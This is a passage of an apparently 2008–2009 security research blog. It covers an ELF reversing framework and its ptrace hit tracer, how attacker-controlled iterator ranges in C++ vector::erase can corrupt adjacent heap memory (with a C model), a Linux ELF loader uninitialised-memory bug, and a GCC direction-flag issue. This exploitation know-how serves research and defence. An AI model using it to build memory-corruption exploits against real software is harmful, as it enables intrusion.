FWIW: I emailed Glibc maintainers with my idea (as bad as it is) and did not receive a response.

Further reading on the subject:
malloc.c diff showing the new changes
MallocMaleficarum - The original paper
Aware Article - A good overview of the House of Mind with example code
A real exploit utilizing the first House of Mind 'bins' technique

Friday, July 03, 2009

Leaf - Hit Tracing

I just posted a new version of the Leaf framework, so I thought this might be a good time to blog on how to write and use a hit tracer using Leaf. Even though it is mostly a static analysis tool, the data it collects during this process is really useful to a debugger. I wanted a debug API and I wanted it fast, so a few versions ago I wrote a quick wrapper to Ptrace and put it into Leaf. It has only been tested on x86 Linux so far, so there's work to be done in making it support BSD. I am always looking for ways to make the debugging API cleaner, more useful and easier to code with, so please send any suggestions. Let's look at the steps needed to write a plugin that implements a hit tracer.

Here is what my basic hit tracer, 'lhit' (included with Leaf) implements:

1. LEAF_init() - a mandatory function that must be present in all plugins. You can use it to initialize any private data structures your plugin may need, or you can leave its function body blank.

2. LEAF_interactive() - this is the plugin hook a debugger would want to call. Ideally you only want *one* plugin calling this; it doesn't make sense to have more than one. If your plugin implements this hook it will be called after all other static analysis is finished. Consider it your debugger plugin's main().

3. LEAF_attach(pid_t) - takes a pid_t as its only argument and will attach the debugger to your target process.

4. LEAF_set_hittracer(pid_t, breakpoints_t, int) - this is where it gets slightly tricky. Your plugin must declare a structure somewhere of type breakpoints_t. Pass the target's pid, the breakpoints structure and a flag (ON/OFF) to this function and Leaf will automatically use the vector of function addresses it collected during static analysis and set breakpoints on each of them. There is no need for your plugin to manage any of this. There is also another function called LEAF_set_breakpoint, which takes a pid_t, a breakpoints_t structure, and the address you want to break on. You can use this for any other manual breakpoints you want to set.

5. LEAF_cont(pid_t) - this one is pretty self-explanatory. It takes a pid_t as its only argument and instructs the traced program to continue. At this point Leaf will handle calling wait() for you. All you have to do is inspect and handle the signal it returns. If you used LEAF_set_hittracer and you hit one of the breakpoints it set, then you will want to call LEAF_reinstall_breakpoint and Leaf will take care of putting the old instruction back, single stepping and reinstalling the breakpoint for you.

6. LEAF_get_regs(pid_t, user_regs_struct) - this will retrieve the process's registers for you.

7. LEAF_detach(pid_t) - will detach Leaf from your process.

8. LEAF_cleanup() - another mandatory plugin hook which you can use to free memory or close file descriptors, or you can leave it blank.
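
Step 5 mentions putting the old instruction back, single stepping and reinstalling the breakpoint. The bookkeeping behind that can be sketched in plain C. This is a model that works on a byte buffer instead of a traced process, and the struct and function names are hypothetical, not Leaf's own. A real tracer would read and write the target's memory with ptrace (PTRACE_PEEKTEXT / PTRACE_POKETEXT) rather than index an array.

```c
#include <stddef.h>
#include <stdint.h>

#define INT3 0xCC   /* x86 one-byte breakpoint instruction */

/* Hypothetical per-breakpoint record. */
struct bp {
    size_t  addr;       /* offset of the patched byte in the text buffer */
    uint8_t saved;      /* original byte that INT3 replaced */
    int     installed;  /* non-zero while INT3 is in place */
    int     hits;       /* how many times the breakpoint was reached */
};

/* Save the original byte and patch in the breakpoint. */
void bp_install(uint8_t *text, struct bp *b)
{
    if (!b->installed) {
        b->saved = text[b->addr];
        text[b->addr] = INT3;
        b->installed = 1;
    }
}

/* Put the original instruction byte back. */
void bp_remove(uint8_t *text, struct bp *b)
{
    if (b->installed) {
        text[b->addr] = b->saved;
        b->installed = 0;
    }
}

/* What happens on a hit: count it, restore the original byte so the real
 * instruction can run, then patch the breakpoint back in. */
void bp_handle_hit(uint8_t *text, struct bp *b)
{
    b->hits++;
    bp_remove(text, b);
    /* A real debugger would rewind the program counter by one byte and
     * single-step the target here before continuing. */
    bp_install(text, b);
}
```

A hit tracer is this pattern applied to every function address found during static analysis, with the hit counts reported at the end.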

You will find an example hit tracer (lhit) which implements all of this in version 0.0.15 of Leaf here. It's not the best hit tracer in the world but it does the job. The debugger internals will be getting an overhaul soon, but the API should stay the same.

This new version of Leaf also contains my experimental LeafRub plugin which embeds a Ruby interpreter for scripting capabilities. An example LeafRub.rb script is also included, but I'll blog more about that later.

Saturday, June 20, 2009

Fun with erase()

Over the last few months I've been knee deep in C++. You can view this as a good thing or a bad thing; I for one enjoy it. I personally like finding bugs in C++ applications, as they are usually more complex than plain old C and require a bit more thought:
  • Keeping track of what variables your destructor will take care of, and which it won't
  • Iterators, and what methods invalidate them
  • (insert your favorite C++ gotcha here)
While debugging a crash one day it occurred to me that the security research community has paid very little attention to the STL and C++-isms in general. There are a few things out there like TAOSSA's delete vs delete[] and of course there are also CERT's secure coding standards. But there is very little written on exploring STL specific bugs. Maybe it's all private and I'm just not cool enough to see it :/

I decided to document some ways STL specific bugs may be exploited. The first place I looked was containers: vectors, queues, lists and so on. Any use of these containers probably means lots of interesting data is being stored, and considering they all have very easy-to-use methods, even novice C++ developers are (ab)using them somewhere.
Most of these methods take in iterators (don't let the name fool you, they're just pointers), and tainted iterators have been a known bad thing for a long time (read CERT's secure coding standards). But where were the exploits? Where were the how-to's on owning an attacker-influenced iterator? I decided to look into it myself.
I settled on using vectors as my first topic of interest, as they are widely used for their efficiency and ease of use. I further focused my efforts by looking at any method that added/moved/deleted multiple elements of data at a time from a container. The erase method seemed like a good candidate considering the number of memory copies that take place under the hood.
The erase method either takes a single position within the container and removes it, or it takes a range supplied by two iterators and deletes the elements within that range. But I needed to see what it looked like under the hood. After navigating the tangled mess that is the GNU C++ templates (this is probably the real reason no one has done a lot of STL security research) I was able to isolate the relevant erase() code and find what I was looking for.
This is where you are probably getting bored, so I'll skip ahead and just tell you why you care about any of this.
Tainted iterators are a known C++ gotcha that every code auditor should know about, but in certain situations they can lead to very interesting conditions for an exploit writer. The CERT secure coding standard begins to touch on the subject of invalid iterator ranges, but labels their 'undefined behavior' as equivalent to a buffer overflow. This is true, however it can be more than that depending on the STL implementation. When an attacker can control the range iterators passed to erase() he may be able to leak or directly overwrite memory contents, or even better, he can trick the STL into resizing the container to encapsulate adjacent heap memory (think 'other containers'). This opens up all kinds of doors for creative exploitation.
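
The resizing effect can be illustrated with a small C model. It assumes a range erase that slides the tail of the container down to the first iterator and then recomputes the end pointer from the two iterators without checking their order. That is a simplification for illustration, not the actual templated C++ code, and every name here is hypothetical.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical cut-down vector of ints: only the two pointers that matter. */
struct int_vec {
    int *start;    /* first element */
    int *finish;   /* one past the last element */
};

/* Model of a range erase: slide the tail [last, finish) down to 'first',
 * then recompute the end from the iterators. Nothing checks first <= last. */
void model_erase(struct int_vec *v, int *first, int *last)
{
    if (first == last)
        return;
    if (last != v->finish)
        memmove(first, last, (size_t)(v->finish - last) * sizeof *first);
    v->finish = first + (v->finish - last);
}

/* 'heap' stands in for 16 ints of contiguous heap memory. The vector owns
 * the first 8; the rest belongs to its neighbours. Returns the element
 * count after erasing with a swapped (first > last) range. */
size_t demo_swapped_range(int heap[16])
{
    struct int_vec v = { heap, heap + 8 };
    int i;

    for (i = 0; i < 16; i++)
        heap[i] = i;
    model_erase(&v, heap + 6, heap + 2);
    return (size_t)(v.finish - v.start);
}
```

With these numbers the model vector reports 12 elements instead of 8, and the four ints just past its original end have been overwritten with copies of its own data.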

I would love to post those details here, but Blogger mangled my write-up pretty badly, so I've uploaded it here. If you spot any inaccurate technical information please let me know.

Thursday, January 08, 2009

Leaf

It's been awhile since I have posted. This blog is up to almost 500 subscribers somehow.

I posted a new project on googlecode. Leaf is an ELF reversing framework written in C. It has a built-in API for developing your own analysis and output plugins. The current version (0.0.7) supports plugins written in C. The whole point of the project is flexibility in the analysis and output of the stuff you're interested in. It's not just another text-based disassembler, although a plugin that implements one can be easily written. In fact I released one with it and it's available for download at the website. I am slowly releasing other plugins of varying quality. There are plenty of great tools for reversing on the Win32 platform, so there is no plan to support the PE format. If you want more information on it check out the googlecode link and look at the wiki.
It's still beta quality and there are definitely a few bugs. I hope you find it useful.

Update: Posted Leaf-0.0.10.tar.gz at http://leaf-re.googlecode.com It now uses udis86. Lots of work still to do, but it's a start.

Wednesday, June 25, 2008

BitStruct is great

If you code in Ruby and do any binary parsing then you need to be using BitStruct. It makes C style structs in Ruby very easy. Sometimes you have to sniff a custom binary protocol the quick and dirty way, and these are the times I turn to Ruby instead of C. The BitStruct release has some good examples of parsing network protocols, but using raw sockets in Ruby is ugly. I prefer to use the LibPcap wrappers instead for the awesomeness of pcap filters.
require 'pcaplet'
require 'bit-struct'

# Fake protocol I made up for this example
class CustomProtocol < BitStruct
  char :header, 64, :endian => :native
  unsigned :length, 8, :endian => :native
  unsigned :next_hdr, 16, :endian => :little
  unsigned :next_tag, 16, :endian => :network
  unsigned :type, 32, :endian => :native
  rest :data
end

# Capture up to 1533 bytes
sniff = Pcaplet.new('-s 1533')

# Specific pcap filter so we only grab the protocol we are dissecting
pcap_filter = Pcap::Filter.new('tcp && port 34504 && src 192.168.1.10', sniff.capture)

sniff.add_filter(pcap_filter)

for pkt in sniff
  if pcap_filter =~ pkt
    puts pkt
    struct = CustomProtocol.new(pkt.tcp_data)
    puts sprintf("ASCII Header: %s\tLength: %x\tNext Hdr: %x\tNext Tag: %x\tType: %x\tData: %s",
                 struct.header, struct.length, struct.next_hdr, struct.next_tag, struct.type, struct.data)
  end
end

Tuesday, June 03, 2008

Known API's and automated static code analysis

I did some quick work a few weeks ago on automating static code analysis by using known API's to generate information about data structures and logic flow. The work is not ground breaking but I felt the techniques are quite useful and I wanted to document them clearly for myself and others. You can grab the short paper here.

It's interesting that the slides Halvar presented in 2004 on automating reverse engineering are still entirely relevant. He made a good point ... "no matter how stupid an analysis tool is, some programmers will make mistakes which are stupider". How true...

Friday, May 02, 2008

Self Protecting GOT

I had some time to kill over the past few days and I wanted to explore an idea I had a few months ago. The idea is to protect the ELF GOT (Global Offset Table) (and other segments of memory) from userland without the support of 'relro' functionality now found in the GNU dynamic linker. I accomplished it through techniques such as linker script modification and constructor functions. No kernel modifications are needed and I have tested it on a semi large project (Snort IDS).

You can find the draft version 1.1 of my writeup here. If you find any mistakes let me know and I will fix them.

Friday, April 18, 2008

kmemcheck and an old bug

I wanted to do a quick post about 'kmemcheck' because I think the concept is pretty cool. It's a debugging patch in its 7th rev that is now proposed for the mainline Linux kernel in 2.6.26 and the idea is pretty simple but has lots of security uses...
"kmemcheck is a patch to the linux kernel that detects use of uninitialized memory. It does this by trapping every read and write to memory that was allocated dynamically (e.g. using kmalloc()). If a memory address is read that has not previously been written to, a message is printed to the kernel log."
The author provided a sample log file from the patch which is here. I spent a few minutes browsing it and I think it definitely shows promise for more than debugging. **Consider the case of these ELF loader vulnerabilities found by Paul Starzetz in 2004. Bug [1] is basically incorrect checking of the kernel_read() return value. Here's the bug:

...

size = elf_ex.e_phnum * sizeof(struct elf_phdr);
elf_phdata = (struct elf_phdr *) kmalloc(size, GFP_KERNEL);
if (!elf_phdata)
    goto out;

retval = kernel_read(bprm->file, elf_ex.e_phoff, (char *) elf_phdata, size);
if (retval < 0)
    goto out_free_ph;

...

The code above makes the incorrect assumption that kernel_read() only signals a problem by returning less than zero. It does return a negative value on error, but it can also return a value greater than zero and less than 'size', which in this case leaves a portion of elf_phdata uninitialized. What's my point? I'm getting to that. An attacker can potentially control this uninitialized data and take control of a process image. Now this particular bug is pretty hard to trigger and even harder to exploit. But the important thing is that kmemcheck may have caught this particular issue, and others like it. kmemcheck would fire off a log entry when the ELF loader goes to read the uninitialized data in elf_phdata, because technically the attacker-controlled data was never written to it in this context; it's old 'left over' data. Very neat stuff.
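
The difference between the two checks is easy to show in a userland model. In this sketch model_read is a hypothetical stand-in for kernel_read() that can return a short count, and loose_check / strict_check are illustrative names, not kernel functions.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for kernel_read(): copies at most 'avail' bytes
 * into buf and returns how many bytes were actually copied. */
long model_read(const unsigned char *file, size_t avail,
                unsigned char *buf, size_t want)
{
    size_t n = want < avail ? want : avail;

    memcpy(buf, file, n);
    return (long)n;
}

/* The check from the vulnerable loader: only a negative return is fatal. */
int loose_check(long retval, size_t size)
{
    (void)size;
    return retval < 0 ? -1 : 0;
}

/* A stricter check: anything other than a full read is treated as an error. */
int strict_check(long retval, size_t size)
{
    return (retval < 0 || (size_t)retval != size) ? -1 : 0;
}
```

When only half of the requested bytes arrive, loose_check accepts the buffer even though its second half still holds whatever was in the allocation before, while strict_check rejects it.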

The kernel allocators are a bit more complex than malloc in userland though. The slab code has many small details about it that can make or break a kmalloc based vulnerability, but the concept here is very intriguing regardless. You can grab the kmemcheck patches here.

**As a side note, I took a quick look at linux/fs/binfmt_elf_fdpic.c and found this bug in virtually the same place as Paul found it and in an additional spot as well, where the program interpreter is loaded. They affect a small population and have already been fixed.

Wednesday, March 19, 2008

CLD/STD and GCC 4.3.0

Some of you may have seen this already. It's a very subtle bug that was exposed by GCC 4.3.0 and manifests itself in an interesting way. Here's a quick overview. In its latest version, GCC has changed a very small detail. Before version 4.3.0 GCC would insert a CLD (Clear Direction Flag) instruction before any inline string copy functions as shown below:

804de86: fc cld
804de87: f3 a4 rep movsb %ds:(%esi),%es:(%edi)
804de89: 89 c1 mov %eax,%ecx
804de8b: c1 e9 02 shr $0x2,%ecx

This instruction (CLD) clears a flag that determines which direction data should be written in (forward or backward). The flag itself is stored in the EFLAGS register. Clearing the flag with CLD sets it to 0 (forward). The STD instruction can then change this by setting the flag to 1 (backward). GCC no longer emits CLD before inline string copies. This change is documented here. Technically this is right because the ABI states the direction flag should be cleared before entering any function (see page 38 under EFLAGS). The problem in this case is that the Linux kernel does not clear the flag when entering a signal handler. So in theory the flag is set to 1 for whatever reason, a signal gets tripped, and the handler calls something like memcpy or memmove. Since the CLD instruction is no longer emitted inline, the copy can write data in the wrong direction. This can obviously lead to security issues. I put together some x86 example code for this based on the x86_64 version posted to LKML, you can find it here.
./cld
Hit Ctrl+C
In signal handler...
DF = 1 (backward)
In signal handler...
DF = 1 (backward)
In signal handler...
DF = 0 (forward)
In signal handler...
DF = 0 (forward)
In signal handler...
DF = 1 (backward)